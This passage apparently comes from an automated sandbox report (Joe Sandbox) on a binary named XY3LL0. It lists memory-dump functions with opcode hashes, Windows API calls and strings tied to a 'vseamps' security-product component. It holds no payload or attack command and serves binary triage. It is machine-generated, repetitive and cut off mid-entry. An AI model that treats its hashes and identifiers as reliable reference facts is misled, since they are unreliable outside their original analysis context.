                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -
                                                                                            • API String ID: 0-2547889144
                                                                                            • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                            • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                                            • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                            • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -
                                                                                            • API String ID: 0-2547889144
                                                                                            • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                            • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                                            • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                            • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                            • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                                            • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                            • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                            • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                                            • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                            • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                            • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                                            • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                            • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                            • Instruction ID: d1bed244d7ed21aaa205bd0199b39823c0ad418e338c6eda34d152df14145558
                                                                                            • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                            • Instruction Fuzzy Hash: B8F06272B192958EEBA49F28A842E297BD0E7583D0F948039D69F83B44E63D90608F44

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                            • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                            • API String ID: 1021822269-3147033232
                                                                                            • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                            • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                                            • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                            • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                            • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                            • API String ID: 883923345-381368982
                                                                                            • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                            • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                                            • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                            • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                            • String ID:
                                                                                            • API String ID: 1613947383-0
                                                                                            • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                            • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                                            • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                            • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                            • String ID:
                                                                                            • API String ID: 1995290849-0
                                                                                            • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                            • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                                            • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                            • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                            • String ID:
                                                                                            • API String ID: 1995290849-0
                                                                                            • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                            • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                                            • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                            • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                            • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                            • API String ID: 93015348-1041928032
                                                                                            • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                            • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                                            • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                            • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                            • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                            • API String ID: 3682727354-300733478
                                                                                            • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                            • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                                            • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                            • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                            • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                            • API String ID: 2587151837-1427723692
                                                                                            • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                            • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                                            • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                            • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                            • String ID: SetDllDirectoryW$kernel32.dll
                                                                                            • API String ID: 3184163350-3826188083
                                                                                            • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                            • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                                            • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                            • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocProcesslstrlen
                                                                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                            • API String ID: 3424473247-996641649
                                                                                            • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                            • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                                            • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                            • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1775797328-0
                                                                                            • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                            • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                            • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                            • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                            • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1232609184-0
                                                                                            • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                            • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                            • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                            • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
